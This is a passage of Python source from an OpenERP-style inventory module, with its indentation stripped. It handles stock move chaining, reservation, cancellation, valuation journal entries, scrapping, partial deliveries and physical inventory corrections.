result[pick_id] += res2[pick_id]
else:
result.setdefault(m.picking_id, [])
result[m.picking_id].append( (m, dest) )
return result
def _prepare_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
"""Prepare the definition (values) to create a new chained picking.
:param str picking_name: desired new picking name
:param browse_record picking: source picking (being chained to)
:param str picking_type: desired new picking type
:param list moves_todo: specification of the stock moves to be later included in this
picking, in the form::
[[move, (dest_location, auto_packing, chained_delay, chained_journal,
chained_company_id, chained_picking_type)],
...
]
See also :meth:`stock_location.chained_location_get`.
"""
res_company = self.pool.get('res.company')
return {
'name': picking_name,
'origin': tools.ustr(picking.origin or ''),
'type': picking_type,
'note': picking.note,
'move_type': picking.move_type,
'auto_picking': moves_todo[0][1][1] == 'auto',
'stock_journal_id': moves_todo[0][1][3],
'company_id': moves_todo[0][1][4] or res_company._company_default_get(cr, uid, 'stock.company', context=context),
'partner_id': picking.partner_id.id,
'invoice_state': 'none',
'date': picking.date,
}
def _create_chained_picking(self, cr, uid, picking_name, picking, picking_type, moves_todo, context=None):
picking_obj = self.pool.get('stock.picking')
return picking_obj.create(cr, uid, self._prepare_chained_picking(cr, uid, picking_name, picking, picking_type, moves_todo, context=context))
def create_chained_picking(self, cr, uid, moves, context=None):
res_obj = self.pool.get('res.company')
location_obj = self.pool.get('stock.location')
move_obj = self.pool.get('stock.move')
wf_service = netsvc.LocalService("workflow")
new_moves = []
if context is None:
context = {}
seq_obj = self.pool.get('ir.sequence')
for picking, chained_moves in self._chain_compute(cr, uid, moves, context=context).items():
# We group the moves by automatic move type, so it creates different pickings for different types
moves_by_type = {}
for move in chained_moves:
moves_by_type.setdefault(move[1][1], []).append(move)
for todo in moves_by_type.values():
ptype = todo[0][1][5] and todo[0][1][5] or location_obj.picking_type_get(cr, uid, todo[0][0].location_dest_id, todo[0][1][0])
if picking:
# name of new picking according to its type
if ptype == 'internal':
new_pick_name = seq_obj.get(cr, uid,'stock.picking')
else :
new_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + ptype)
pickid = self._create_chained_picking(cr, uid, new_pick_name, picking, ptype, todo, context=context)
# Need to check name of old picking because it always considers picking as "OUT" when created from Sales Order
old_ptype = location_obj.picking_type_get(cr, uid, picking.move_lines[0].location_id, picking.move_lines[0].location_dest_id)
if old_ptype != picking.type:
old_pick_name = seq_obj.get(cr, uid, 'stock.picking.' + old_ptype)
self.pool.get('stock.picking').write(cr, uid, [picking.id], {'name': old_pick_name, 'type': old_ptype}, context=context)
else:
pickid = False
for move, (loc, dummy, delay, dummy, company_id, ptype, invoice_state) in todo:
new_id = move_obj.copy(cr, uid, move.id, {
'location_id': move.location_dest_id.id,
'location_dest_id': loc.id,
'date': time.strftime('%Y-%m-%d'),
'picking_id': pickid,
'state': 'waiting',
'company_id': company_id or res_obj._company_default_get(cr, uid, 'stock.company', context=context) ,
'move_history_ids': [],
'date_expected': (datetime.strptime(move.date, '%Y-%m-%d %H:%M:%S') + relativedelta(days=delay or 0)).strftime('%Y-%m-%d'),
'move_history_ids2': []}
)
move_obj.write(cr, uid, [move.id], {
'move_dest_id': new_id,
'move_history_ids': [(4, new_id)]
})
new_moves.append(self.browse(cr, uid, [new_id])[0])
if pickid:
wf_service.trg_validate(uid, 'stock.picking', pickid, 'button_confirm', cr)
if new_moves:
new_moves += self.create_chained_picking(cr, uid, new_moves, context)
return new_moves
def action_confirm(self, cr, uid, ids, context=None):
""" Confirms stock move.
@return: List of ids.
"""
moves = self.browse(cr, uid, ids, context=context)
self.write(cr, uid, ids, {'state': 'confirmed'})
self.create_chained_picking(cr, uid, moves, context)
return []
def action_assign(self, cr, uid, ids, *args):
""" Changes state to confirmed or waiting.
@return: List of values
"""
todo = []
for move in self.browse(cr, uid, ids):
if move.state in ('confirmed', 'waiting'):
todo.append(move.id)
res = self.check_assign(cr, uid, todo)
return res
def force_assign(self, cr, uid, ids, context=None):
""" Changes the state to assigned.
@return: True
"""
self.write(cr, uid, ids, {'state': 'assigned'})
wf_service = netsvc.LocalService('workflow')
for move in self.browse(cr, uid, ids, context):
if move.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
return True
def cancel_assign(self, cr, uid, ids, context=None):
""" Changes the state to confirmed.
@return: True
"""
self.write(cr, uid, ids, {'state': 'confirmed'})
# fix for bug lp:707031
# called write of related picking because changing move availability does
# not trigger workflow of picking in order to change the state of picking
wf_service = netsvc.LocalService('workflow')
for move in self.browse(cr, uid, ids, context):
if move.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.picking_id.id, cr)
return True
#
# Duplicate stock.move
#
def check_assign(self, cr, uid, ids, context=None):
""" Checks the product type and accordingly writes the state.
@return: No. of moves done
"""
done = []
count = 0
pickings = {}
if context is None:
context = {}
for move in self.browse(cr, uid, ids, context=context):
if move.product_id.type == 'consu' or move.location_id.usage == 'supplier':
if move.state in ('confirmed', 'waiting'):
done.append(move.id)
pickings[move.picking_id.id] = 1
continue
if move.state in ('confirmed', 'waiting'):
# Important: we must pass lock=True to _product_reserve() to avoid race conditions and double reservations
res = self.pool.get('stock.location')._product_reserve(cr, uid, [move.location_id.id], move.product_id.id, move.product_qty, {'uom': move.product_uom.id}, lock=True)
if res:
#_product_available_test depends on the next status for correct functioning
#the test does not work correctly if the same product occurs multiple times
#in the same order. This is e.g. the case when using the button 'split in two' of
#the stock outgoing form
self.write(cr, uid, [move.id], {'state':'assigned'})
done.append(move.id)
pickings[move.picking_id.id] = 1
r = res.pop(0)
product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, [move.id], move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
cr.execute('update stock_move set location_id=%s, product_qty=%s, product_uos_qty=%s where id=%s', (r[1], r[0],product_uos_qty, move.id))
while res:
r = res.pop(0)
product_uos_qty = self.pool.get('stock.move').onchange_quantity(cr, uid, [move.id], move.product_id.id, r[0], move.product_id.uom_id.id, move.product_id.uos_id.id)['value']['product_uos_qty']
move_id = self.copy(cr, uid, move.id, {'product_uos_qty': product_uos_qty, 'product_qty': r[0], 'location_id': r[1]})
done.append(move_id)
if done:
count += len(done)
self.write(cr, uid, done, {'state': 'assigned'})
if count:
for pick_id in pickings:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
return count
def setlast_tracking(self, cr, uid, ids, context=None):
assert len(ids) == 1, "1 ID expected, got %s" % (ids, )
tracking_obj = self.pool['stock.tracking']
move = self.browse(cr, uid, ids[0], context=context)
picking_id = move.picking_id.id
if picking_id:
move_ids = self.search(cr, uid, [
('picking_id', '=', picking_id),
('tracking_id', '!=', False)
], limit=1, order='tracking_id DESC', context=context)
if move_ids:
tracking_move = self.browse(cr, uid, move_ids[0],
context=context)
tracking_id = tracking_move.tracking_id.id
else:
tracking_id = tracking_obj.create(cr, uid, {}, context=context)
self.write(cr, uid, move.id,
{'tracking_id': tracking_id},
context=context)
return True
#
# Cancel move => cancel others move and pickings
#
def action_cancel(self, cr, uid, ids, context=None):
""" Cancels the moves and if all moves are cancelled it cancels the picking.
@return: True
"""
if not len(ids):
return True
if context is None:
context = {}
pickings = set()
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('confirmed', 'waiting', 'assigned', 'draft'):
if move.picking_id:
pickings.add(move.picking_id.id)
if move.move_dest_id and move.move_dest_id.state == 'waiting':
self.write(cr, uid, [move.move_dest_id.id], {'state': 'confirmed'}, context=context)
if context.get('call_unlink',False) and move.move_dest_id.picking_id:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
self.write(cr, uid, ids, {'state': 'cancel', 'move_dest_id': False}, context=context)
if not context.get('call_unlink',False):
for pick in self.pool.get('stock.picking').browse(cr, uid, list(pickings), context=context):
if all(move.state == 'cancel' for move in pick.move_lines):
self.pool.get('stock.picking').write(cr, uid, [pick.id], {'state': 'cancel'}, context=context)
wf_service = netsvc.LocalService("workflow")
for id in ids:
wf_service.trg_trigger(uid, 'stock.move', id, cr)
return True
def _get_accounting_data_for_valuation(self, cr, uid, move, context=None):
"""
Return the accounts and journal to use to post Journal Entries for the real-time
valuation of the move.
:param context: context dictionary that can explicitly mention the company to consider via the 'force_company' key
        :raise: osv.except_osv() if any mandatory account or journal is not defined.
"""
product_obj=self.pool.get('product.product')
accounts = product_obj.get_product_accounts(cr, uid, move.product_id.id, context)
if move.location_id.valuation_out_account_id:
acc_src = move.location_id.valuation_out_account_id.id
else:
acc_src = accounts['stock_account_input']
if move.location_dest_id.valuation_in_account_id:
acc_dest = move.location_dest_id.valuation_in_account_id.id
else:
acc_dest = accounts['stock_account_output']
acc_valuation = accounts.get('property_stock_valuation_account_id', False)
journal_id = accounts['stock_journal']
if acc_dest == acc_valuation:
raise osv.except_osv(_('Error!'), _('Cannot create Journal Entry, Output Account of this product and Valuation account on category of this product are same.'))
if acc_src == acc_valuation:
raise osv.except_osv(_('Error!'), _('Cannot create Journal Entry, Input Account of this product and Valuation account on category of this product are same.'))
if not acc_src:
raise osv.except_osv(_('Error!'), _('Please define stock input account for this product or its category: "%s" (id: %d)') % \
(move.product_id.name, move.product_id.id,))
if not acc_dest:
raise osv.except_osv(_('Error!'), _('Please define stock output account for this product or its category: "%s" (id: %d)') % \
(move.product_id.name, move.product_id.id,))
if not journal_id:
raise osv.except_osv(_('Error!'), _('Please define journal on the product category: "%s" (id: %d)') % \
(move.product_id.categ_id.name, move.product_id.categ_id.id,))
if not acc_valuation:
raise osv.except_osv(_('Error!'), _('Please define inventory valuation account on the product category: "%s" (id: %d)') % \
(move.product_id.categ_id.name, move.product_id.categ_id.id,))
return journal_id, acc_src, acc_dest, acc_valuation
def _get_reference_accounting_values_for_valuation(self, cr, uid, move, context=None):
"""
Return the reference amount and reference currency representing the inventory valuation for this move.
These reference values should possibly be converted before being posted in Journals to adapt to the primary
and secondary currencies of the relevant accounts.
"""
product_uom_obj = self.pool.get('product.uom')
# by default the reference currency is that of the move's company
reference_currency_id = move.company_id.currency_id.id
default_uom = move.product_id.uom_id.id
qty = product_uom_obj._compute_qty(cr, uid, move.product_uom.id, move.product_qty, default_uom)
# if product is set to average price and a specific value was entered in the picking wizard,
# we use it
if move.location_dest_id.usage != 'internal' and move.product_id.cost_method == 'average':
reference_amount = qty * move.product_id.standard_price
elif move.product_id.cost_method == 'average' and move.price_unit:
reference_amount = qty * move.price_unit
reference_currency_id = move.price_currency_id.id or reference_currency_id
# Otherwise we default to the company's valuation price type, considering that the values of the
# valuation field are expressed in the default currency of the move's company.
else:
if context is None:
context = {}
currency_ctx = dict(context, currency_id = move.company_id.currency_id.id)
amount_unit = move.product_id.price_get('standard_price', context=currency_ctx)[move.product_id.id]
reference_amount = amount_unit * qty
return reference_amount, reference_currency_id
def _update_average_price(self, cr, uid, move, context=None):
product_obj = self.pool.get('product.product')
currency_obj = self.pool.get('res.currency')
uom_obj = self.pool.get('product.uom')
product_avail = {}
if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
product = product_obj.browse(cr, uid, move.product_id.id)
move_currency_id = move.company_id.currency_id.id
context['currency_id'] = move_currency_id
product_qty = move.product_qty
product_uom = move.product_uom.id
product_price = move.price_unit
product_currency = move.price_currency_id.id
if product.id not in product_avail:
# keep track of stock on hand including processed lines not yet marked as done
product_avail[product.id] = product.qty_available
qty = uom_obj._compute_qty(cr, uid, product_uom, product_qty, product.uom_id.id)
if qty > 0:
new_price = currency_obj.compute(cr, uid, product_currency,
move_currency_id, product_price, round=False)
new_price = uom_obj._compute_price(cr, uid, product_uom, new_price,
product.uom_id.id)
if product_avail[product.id] <= 0:
product_avail[product.id] = 0
new_std_price = new_price
else:
# Get the standard price
amount_unit = product.price_get('standard_price', context=context)[product.id]
new_std_price = ((amount_unit * product_avail[product.id])\
+ (new_price * qty))/(product_avail[product.id] + qty)
product_obj.write(cr, uid, [product.id],{'standard_price': new_std_price})
product_avail[product.id] += qty
def _create_product_valuation_moves(self, cr, uid, move, context=None):
"""
        Generate the appropriate accounting moves if the product being moved is subject
to real_time valuation tracking, and the source or destination location is
a transit location or is outside of the company.
"""
if move.product_id.valuation == 'real_time': # FIXME: product valuation should perhaps be a property?
if context is None:
context = {}
src_company_ctx = dict(context,force_company=move.location_id.company_id.id)
dest_company_ctx = dict(context,force_company=move.location_dest_id.company_id.id)
            # use the company of the move rather than the user's company,
            # so that the correct period is selected
company_ctx = dict(context, company_id=move.company_id.id)
account_moves = []
# Outgoing moves (or cross-company output part)
if move.location_id.company_id \
and (move.location_id.usage == 'internal' and move.location_dest_id.usage != 'internal'\
or move.location_id.company_id != move.location_dest_id.company_id):
journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, src_company_ctx)
reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
#returning goods to supplier
if move.location_dest_id.usage == 'supplier':
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_src, reference_amount, reference_currency_id, context))]
else:
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_valuation, acc_dest, reference_amount, reference_currency_id, context))]
# Incoming moves (or cross-company input part)
if move.location_dest_id.company_id \
and (move.location_id.usage != 'internal' and move.location_dest_id.usage == 'internal'\
or move.location_id.company_id != move.location_dest_id.company_id):
journal_id, acc_src, acc_dest, acc_valuation = self._get_accounting_data_for_valuation(cr, uid, move, dest_company_ctx)
reference_amount, reference_currency_id = self._get_reference_accounting_values_for_valuation(cr, uid, move, src_company_ctx)
#goods return from customer
if move.location_id.usage == 'customer':
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_dest, acc_valuation, reference_amount, reference_currency_id, context))]
else:
account_moves += [(journal_id, self._create_account_move_line(cr, uid, move, acc_src, acc_valuation, reference_amount, reference_currency_id, context))]
move_obj = self.pool.get('account.move')
for j_id, move_lines in account_moves:
move_obj.create(cr, uid,
{
'journal_id': j_id,
'line_id': move_lines,
'company_id': move.company_id.id,
'ref': move.picking_id and move.picking_id.name}, context=company_ctx)
def action_done(self, cr, uid, ids, context=None):
""" Makes the move done and if all moves are done, it will finish the picking.
        @return: True
"""
picking_ids = []
move_ids = []
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
todo = []
for move in self.browse(cr, uid, ids, context=context):
if move.state=="draft":
todo.append(move.id)
if todo:
self.action_confirm(cr, uid, todo, context=context)
todo = []
for move in self.browse(cr, uid, ids, context=context):
if move.state in ['done','cancel']:
continue
move_ids.append(move.id)
if move.picking_id:
picking_ids.append(move.picking_id.id)
if move.move_dest_id.id and (move.state != 'done'):
# Downstream move should only be triggered if this move is the last pending upstream move
other_upstream_move_ids = self.search(cr, uid, [('id','not in',move_ids),('state','not in',['done','cancel']),
('move_dest_id','=',move.move_dest_id.id)], context=context)
if not other_upstream_move_ids:
self.write(cr, uid, [move.id], {'move_history_ids': [(4, move.move_dest_id.id)]})
if move.move_dest_id.state in ('waiting', 'confirmed'):
self.force_assign(cr, uid, [move.move_dest_id.id], context=context)
if move.move_dest_id.picking_id:
wf_service.trg_write(uid, 'stock.picking', move.move_dest_id.picking_id.id, cr)
if move.move_dest_id.auto_validate:
self.action_done(cr, uid, [move.move_dest_id.id], context=context)
self._update_average_price(cr, uid, move, context=context)
self._create_product_valuation_moves(cr, uid, move, context=context)
if move.state not in ('confirmed','done','assigned'):
todo.append(move.id)
if todo:
self.action_confirm(cr, uid, todo, context=context)
self.write(cr, uid, move_ids, {'state': 'done', 'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)}, context=context)
for id in move_ids:
wf_service.trg_trigger(uid, 'stock.move', id, cr)
for pick_id in picking_ids:
wf_service.trg_write(uid, 'stock.picking', pick_id, cr)
return True
def _create_account_move_line(self, cr, uid, move, src_account_id, dest_account_id, reference_amount, reference_currency_id, context=None):
"""
Generate the account.move.line values to post to track the stock valuation difference due to the
processing of the given stock move.
"""
# prepare default values considering that the destination accounts have the reference_currency_id as their main currency
partner_id = (move.picking_id.partner_id and self.pool.get('res.partner')._find_accounting_partner(move.picking_id.partner_id).id) or False
debit_line_vals = {
'name': move.name,
'product_id': move.product_id and move.product_id.id or False,
'quantity': move.product_qty,
'ref': move.picking_id and move.picking_id.name or False,
'date': time.strftime('%Y-%m-%d'),
'partner_id': partner_id,
'debit': reference_amount,
'account_id': dest_account_id,
}
credit_line_vals = {
'name': move.name,
'product_id': move.product_id and move.product_id.id or False,
'quantity': move.product_qty,
'ref': move.picking_id and move.picking_id.name or False,
'date': time.strftime('%Y-%m-%d'),
'partner_id': partner_id,
'credit': reference_amount,
'account_id': src_account_id,
}
# if we are posting to accounts in a different currency, provide correct values in both currencies correctly
# when compatible with the optional secondary currency on the account.
# Financial Accounts only accept amounts in secondary currencies if there's no secondary currency on the account
# or if it's the same as that of the secondary amount being posted.
account_obj = self.pool.get('account.account')
src_acct, dest_acct = account_obj.browse(cr, uid, [src_account_id, dest_account_id], context=context)
src_main_currency_id = src_acct.company_id.currency_id.id
dest_main_currency_id = dest_acct.company_id.currency_id.id
cur_obj = self.pool.get('res.currency')
if reference_currency_id != src_main_currency_id:
# fix credit line:
credit_line_vals['credit'] = cur_obj.compute(cr, uid, reference_currency_id, src_main_currency_id, reference_amount, context=context)
if (not src_acct.currency_id) or src_acct.currency_id.id == reference_currency_id:
credit_line_vals.update(currency_id=reference_currency_id, amount_currency=-reference_amount)
if reference_currency_id != dest_main_currency_id:
# fix debit line:
debit_line_vals['debit'] = cur_obj.compute(cr, uid, reference_currency_id, dest_main_currency_id, reference_amount, context=context)
if (not dest_acct.currency_id) or dest_acct.currency_id.id == reference_currency_id:
debit_line_vals.update(currency_id=reference_currency_id, amount_currency=reference_amount)
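        # The returned pairs use the ORM one2many command format (0, 0, values),
        # i.e. "create a new record with these values", so the result can be passed
        # directly as the 'line_id' of the account.move created by the caller
        # (see _create_product_valuation_moves above).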
return [(0, 0, debit_line_vals), (0, 0, credit_line_vals)]
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
ctx = context.copy()
for move in self.browse(cr, uid, ids, context=context):
if move.state != 'draft' and not ctx.get('call_unlink', False):
raise osv.except_osv(_('User Error!'), _('You can only delete draft moves.'))
return super(stock_move, self).unlink(
cr, uid, ids, context=ctx)
# _create_lot function is not used anywhere
def _create_lot(self, cr, uid, ids, product_id, prefix=False):
""" Creates production lot
@return: Production lot id
"""
prodlot_obj = self.pool.get('stock.production.lot')
prodlot_id = prodlot_obj.create(cr, uid, {'prefix': prefix, 'product_id': product_id})
return prodlot_id
def action_scrap(self, cr, uid, ids, quantity, location_id, context=None):
""" Move the scrap/damaged product into scrap location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be scrapped
@param quantity : specify scrap qty
@param location_id : specify scrap location
@param context: context arguments
        @return: Scrapped lines
"""
        #quantity should be expressed in the move's UoM
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide a positive quantity to scrap.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
source_location = move.location_id
if move.state == 'done':
source_location = move.location_dest_id
if source_location.usage != 'internal':
                #forbid scrapping from a virtual location because it's meaningless and it may introduce errors in stock ('creating' new products from nowhere)
raise osv.except_osv(_('Error!'), _('Forbidden operation: it is not allowed to scrap products from a virtual location.'))
move_qty = move.product_qty
uos_qty = quantity / move_qty * move.product_uos_qty
default_val = {
'location_id': source_location.id,
'product_qty': quantity,
'product_uos_qty': uos_qty,
'state': move.state,
'scrapped': True,
'location_dest_id': location_id,
'tracking_id': move.tracking_id.id,
'prodlot_id': move.prodlot_id.id,
}
new_move = self.copy(cr, uid, move.id, default_val)
res += [new_move]
product_obj = self.pool.get('product.product')
for product in product_obj.browse(cr, uid, [move.product_id.id], context=context):
if move.picking_id:
uom = product.uom_id.name if product.uom_id else ''
message = _("%s %s %s has been <b>moved to</b> scrap.") % (quantity, uom, product.name)
move.picking_id.message_post(body=message)
self.action_done(cr, uid, res, context=context)
return res
# action_split function is not used anywhere
# FIXME: deprecate this method
def action_split(self, cr, uid, ids, quantity, split_by_qty=1, prefix=False, with_lot=True, context=None):
""" Split Stock Move lines into production lot which specified split by quantity.
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be splited
@param split_by_qty : specify split by qty
@param prefix : specify prefix of production lot
@param with_lot : if true, prodcution lot will assign for split line otherwise not.
@param context: context arguments
@return: Splited move lines
"""
if context is None:
context = {}
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
if split_by_qty <= 0 or quantity == 0:
return res
uos_qty = split_by_qty / move.product_qty * move.product_uos_qty
quantity_rest = quantity % split_by_qty
uos_qty_rest = split_by_qty / move.product_qty * move.product_uos_qty
update_val = {
'product_qty': split_by_qty,
'product_uos_qty': uos_qty,
}
for idx in range(int(quantity//split_by_qty)):
if not idx and move.product_qty<=quantity:
current_move = move.id
else:
current_move = self.copy(cr, uid, move.id, {'state': move.state})
res.append(current_move)
if with_lot:
update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)
self.write(cr, uid, [current_move], update_val)
if quantity_rest > 0:
idx = int(quantity//split_by_qty)
update_val['product_qty'] = quantity_rest
update_val['product_uos_qty'] = uos_qty_rest
if not idx and move.product_qty<=quantity:
current_move = move.id
else:
current_move = self.copy(cr, uid, move.id, {'state': move.state})
res.append(current_move)
if with_lot:
update_val['prodlot_id'] = self._create_lot(cr, uid, [current_move], move.product_id.id)
self.write(cr, uid, [current_move], update_val)
return res
def action_consume(self, cr, uid, ids, quantity, location_id=False, context=None):
""" Consumed product with specific quatity from specific source location
@param cr: the database cursor
@param uid: the user id
@param ids: ids of stock move object to be consumed
@param quantity : specify consume quantity
@param location_id : specify source location
@param context: context arguments
@return: Consumed lines
"""
        #quantity should be expressed in the move's UoM
if context is None:
context = {}
if quantity <= 0:
raise osv.except_osv(_('Warning!'), _('Please provide proper quantity.'))
res = []
for move in self.browse(cr, uid, ids, context=context):
move_qty = move.product_qty
if move_qty <= 0:
raise osv.except_osv(_('Error!'), _('Cannot consume a move with negative or zero quantity.'))
quantity_rest = move.product_qty
quantity_rest -= quantity
uos_qty_rest = quantity_rest / move_qty * move.product_uos_qty
if quantity_rest <= 0:
quantity_rest = 0
uos_qty_rest = 0
quantity = move.product_qty
uos_qty = quantity / move_qty * move.product_uos_qty
if float_compare(quantity_rest, 0, precision_rounding=move.product_id.uom_id.rounding):
default_val = {
'product_qty': quantity,
'product_uos_qty': uos_qty,
'state': move.state,
'location_id': location_id or move.location_id.id,
}
current_move = self.copy(cr, uid, move.id, default_val)
res += [current_move]
update_val = {}
update_val['product_qty'] = quantity_rest
update_val['product_uos_qty'] = uos_qty_rest
self.write(cr, uid, [move.id], update_val)
else:
quantity_rest = quantity
uos_qty_rest = uos_qty
res += [move.id]
update_val = {
'product_qty' : quantity_rest,
'product_uos_qty' : uos_qty_rest,
'location_id': location_id or move.location_id.id,
}
self.write(cr, uid, [move.id], update_val)
self.action_done(cr, uid, res, context=context)
return res
# FIXME: needs refactoring, this code is partially duplicated in stock_picking.do_partial()!
def do_partial(self, cr, uid, ids, partial_datas, context=None):
""" Makes partial pickings and moves done.
@param partial_datas: Dictionary containing details of partial picking
like partner_id, delivery_date, delivery
moves with product_id, product_qty, uom
"""
res = {}
picking_obj = self.pool.get('stock.picking')
wf_service = netsvc.LocalService("workflow")
if context is None:
context = {}
complete, too_many, too_few = [], [], []
move_product_qty = {}
prodlot_ids = {}
for move in self.browse(cr, uid, ids, context=context):
if move.state in ('done', 'cancel'):
continue
partial_data = partial_datas.get('move%s'%(move.id), False)
assert partial_data, _('Missing partial picking data for move #%s.') % (move.id)
product_qty = partial_data.get('product_qty',0.0)
move_product_qty[move.id] = product_qty
product_uom = partial_data.get('product_uom',False)
product_price = partial_data.get('product_price',0.0)
product_currency = partial_data.get('product_currency',False)
prodlot_ids[move.id] = partial_data.get('prodlot_id')
if move.product_qty == product_qty:
complete.append(move)
elif move.product_qty > product_qty:
too_few.append(move)
else:
too_many.append(move)
if (move.picking_id.type == 'in') and (move.product_id.cost_method == 'average'):
# Record the values that were chosen in the wizard, so they can be
# used for average price computation and inventory valuation
self.write(cr, uid, [move.id],
{'price_unit': product_price,
'price_currency_id': product_currency,
})
for move in too_few:
product_qty = move_product_qty[move.id]
if product_qty != 0:
defaults = {
'product_qty' : product_qty,
'product_uos_qty': product_qty,
'picking_id' : move.picking_id.id,
'state': 'assigned',
'move_dest_id': False,
'price_unit': move.price_unit,
}
prodlot_id = prodlot_ids[move.id]
if prodlot_id:
defaults.update(prodlot_id=prodlot_id)
new_move = self.copy(cr, uid, move.id, defaults)
complete.append(self.browse(cr, uid, new_move))
self.write(cr, uid, [move.id],
{
'product_qty': move.product_qty - product_qty,
'product_uos_qty': move.product_qty - product_qty,
'prodlot_id': False,
'tracking_id': False,
})
for move in too_many:
self.write(cr, uid, [move.id],
{
'product_qty': move.product_qty,
'product_uos_qty': move.product_qty,
})
complete.append(move)
for move in complete:
if prodlot_ids.get(move.id):
self.write(cr, uid, [move.id],{'prodlot_id': prodlot_ids.get(move.id)})
self.action_done(cr, uid, [move.id], context=context)
if move.picking_id.id :
# TOCHECK : Done picking if all moves are done
cr.execute("""
SELECT move.id FROM stock_picking pick
RIGHT JOIN stock_move move ON move.picking_id = pick.id AND move.state = %s
WHERE pick.id = %s""",
('done', move.picking_id.id))
res = cr.fetchall()
if len(res) == len(move.picking_id.move_lines):
picking_obj.action_move(cr, uid, [move.picking_id.id])
wf_service.trg_validate(uid, 'stock.picking', move.picking_id.id, 'button_done', cr)
return [move.id for move in complete]
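    # Illustrative shape of partial_datas expected by do_partial() (hypothetical values):
    #   {'move42': {'product_qty': 3.0,
    #               'product_uom': uom_unit_id,
    #               'product_price': 1.5,
    #               'product_currency': currency_id,
    #               'prodlot_id': False}}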
stock_move()
class stock_inventory(osv.osv):
_name = "stock.inventory"
_description = "Inventory"
_columns = {
'name': fields.char('Inventory Reference', size=64, required=True, readonly=True, states={'draft': [('readonly', False)]}),
'date': fields.datetime('Creation Date', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'date_done': fields.datetime('Date done'),
'inventory_line_id': fields.one2many('stock.inventory.line', 'inventory_id', 'Inventories', readonly=True, states={'draft': [('readonly', False)]}),
'move_ids': fields.many2many('stock.move', 'stock_inventory_move_rel', 'inventory_id', 'move_id', 'Created Moves'),
'state': fields.selection( (('draft', 'Draft'), ('cancel','Cancelled'), ('confirm','Confirmed'), ('done', 'Done')), 'Status', readonly=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, select=True, readonly=True, states={'draft':[('readonly',False)]}),
}
_defaults = {
'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'state': 'draft',
'company_id': lambda self,cr,uid,c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
default = default.copy()
default.update({'move_ids': [], 'date_done': False})
return super(stock_inventory, self).copy(cr, uid, id, default, context=context)
def _inventory_line_hook(self, cr, uid, inventory_line, move_vals):
""" Creates a stock move from an inventory line
@param inventory_line:
@param move_vals:
@return:
"""
return self.pool.get('stock.move').create(cr, uid, move_vals)
def action_done(self, cr, uid, ids, context=None):
""" Finish the inventory
@return: True
"""
if context is None:
context = {}
move_obj = self.pool.get('stock.move')
for inv in self.browse(cr, uid, ids, context=context):
move_obj.action_done(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state':'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')}, context=context)
return True
def action_confirm(self, cr, uid, ids, context=None):
""" Confirm the inventory and writes its finished date
@return: True
"""
if context is None:
context = {}
        # to perform the correct inventory corrections we need to analyze stock locations
        # one by one, never recursively, so we use a special context
product_context = dict(context, compute_child=False)
location_obj = self.pool.get('stock.location')
for inv in self.browse(cr, uid, ids, context=context):
move_ids = []
for line in inv.inventory_line_id:
pid = line.product_id.id
product_context.update(uom=line.product_uom.id, to_date=inv.date, date=inv.date, prodlot_id=line.prod_lot_id.id)
amount = location_obj._product_get(cr, uid, line.location_id.id, [pid], product_context)[pid]
change = line.product_qty - amount
lot_id = line.prod_lot_id.id
if change:
location_id = line.product_id.property_stock_inventory.id
value = {
'name': _('INV:') + (line.inventory_id.name or ''),
'product_id': line.product_id.id,
'product_uom': line.product_uom.id,
'prodlot_id': lot_id,
'date': inv.date,
}
if change > 0:
value.update( {
'product_qty': change,
'location_id': location_id,
'location_dest_id': line.location_id.id,
})
else:
value.update( {
'product_qty': -change,
'location_id': line.location_id.id,
'location_dest_id': location_id,
})
move_ids.append(self._inventory_line_hook(cr, uid, line, value))
self.write(cr, uid, [inv.id], {'state': 'confirm', 'move_ids': [(6, 0, move_ids)]})
self.pool.get('stock.move').action_confirm(cr, uid, move_ids, context=context)
return True
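    # Illustrative correction (hypothetical quantities): with a theoretical stock of 10.0
    # and a counted quantity of 7.0, change = -3.0, so action_confirm() creates a move of
    # 3.0 units from the inventoried location to the product's inventory-loss location.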
def action_cancel_draft(self, cr, uid, ids, context=None):
""" Cancels the stock move and change inventory state to draft.
@return: True
"""
for inv in self.browse(cr, uid, ids, context=context):
self.pool.get('stock.move').action_cancel(cr, uid, [x.id for x in inv.move_ids], context=context)
self.write(cr, uid, [inv.id], {'state':'draft'}, context=context)
return True
def action_cancel_inventory(self, cr, uid, ids, context=None):
""" Cancels both stock move and inventory
@return: True
"""
move_obj = self.pool.get('stock.move')
account_move_obj = self.pool.get('account.move')
